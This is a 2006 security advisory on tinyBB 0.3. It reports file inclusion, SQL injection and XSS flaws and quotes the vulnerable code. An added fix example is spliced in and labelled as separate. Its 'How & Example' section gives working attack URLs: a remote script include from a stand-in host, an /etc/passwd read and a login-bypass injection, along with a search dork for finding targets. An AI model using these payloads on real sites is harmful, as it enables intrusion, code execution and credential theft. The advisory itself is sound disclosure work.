Securityvulns SECURITYVULNS:DOC:12870
May 30, 2006 - 12:00 a.m.

Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.


–Security Report–

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 27/05/06 05:37 AM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Using these methods, a remote attacker can include arbitrary files in
tinyBB. The tinybb_footers variable in footers.php is not sanitized before it
is used. The vulnerable code is in footers.php at line 3.
-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability is easy: turn off register_globals.
There is also an SQL injection in forgot.php. The parameter $q is not
sanitized properly before it is used in the SQL query.
The vulnerable code is in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {
4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'";
5: $count = mysql_result(mysql_query($sql),0);
…
-End of source-
This can also lead to XSS. The vulnerable code is in forgot.php at
lines 19-21.
-Source in forgot.php-
19: else {
20: echo "<p>The query <b>$q</b> could not be …
21: }
-End of source-
There is another SQL injection in login.php. The username and password
parameters are not sanitized properly before they are used in the SQL
query. The vulnerable code is in login.php at lines 2-8.
-Source in login.php-
8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'";
-End of source-
I didn't write up all the vulnerabilities in tinyBB; there are too many SQL
injections and XSS vulnerabilities in this tiny bulletin board.
Level: Highly Critical
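
An added example, not part of the original advisory or tinyBB's code: beyond turning off register_globals, the three flaws shown above can be closed with an include allowlist, bound query parameters (PDO, swapped in here for the original mysql_* calls) and output encoding. The function names, footer file names, "no match" wording and in-memory SQLite database are assumptions.

```php
<?php
// Added example, not tinyBB code. The table and column names come from the
// advisory's snippets; the PDO handle, the footer allowlist, the function
// names and the "no match" wording are assumptions made for illustration.

// footers.php: a request value may only select from a fixed set of files.
function tinybb_footer_path(string $name, string $baseDir): ?string
{
    $allowed = ['default' => 'footer_default.php', 'minimal' => 'footer_minimal.php'];
    return isset($allowed[$name]) ? $baseDir . '/' . $allowed[$name] : null;
}

// forgot.php lines 4-5: bind $q as data instead of interpolating it into SQL.
function tinybb_count_members(PDO $db, string $q): int
{
    $stmt = $db->prepare(
        'SELECT COUNT(*) FROM tinybb_members WHERE username = :u OR email = :e'
    );
    $stmt->execute([':u' => $q, ':e' => $q]);
    return (int) $stmt->fetchColumn();
}

// forgot.php line 20: HTML-encode $q before echoing it back to the browser.
function tinybb_not_found_html(string $q): string
{
    return '<p>No member matches <b>' . htmlspecialchars($q, ENT_QUOTES, 'UTF-8') . '</b>.</p>';
}

// Constructed demo data: in-memory SQLite stands in for the board's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tinybb_members (username TEXT, email TEXT)');
$db->exec("INSERT INTO tinybb_members VALUES ('alice', 'alice@example.org')");

// In the real scripts these would be read explicitly, e.g. $_GET['q'],
// never from a global that register_globals created.
$inputs = ['alice', "nobody' OR '1'='1", '<script>alert(1)</script>'];
foreach ($inputs as $q) {
    $n = tinybb_count_members($db, $q);
    echo $n > 0 ? "match: $q\n" : tinybb_not_found_html($q) . "\n";
}

// An allowlisted key resolves to a path; a URL or file path resolves to null.
var_dump(tinybb_footer_path('default', __DIR__));
var_dump(tinybb_footer_path('http://example.org/x.txt', __DIR__));
```

The same binding pattern applies to the username and password comparison in login.php line 8.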

How & Example:
Successful exploitation needs allow_url_fopen set to 1 and register_globals on.
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE ->
http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc is off, a remote attacker can include local files too.
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET ->
http://[victim]/[tBBPath]/login.php?username=heh//or//isnull(1/0)/*&password=nothing

Timeline:

  • 27/05/2006: Vulnerability found.
  • 27/05/2006: Contacted the vendor; waiting for a reply.

Exploit: http://www.nukedx.com/?getxpl=33

Original advisory can be found at: http://www.nukedx.com/?viewdoc=33

Dorks: "Powered by tinyBB"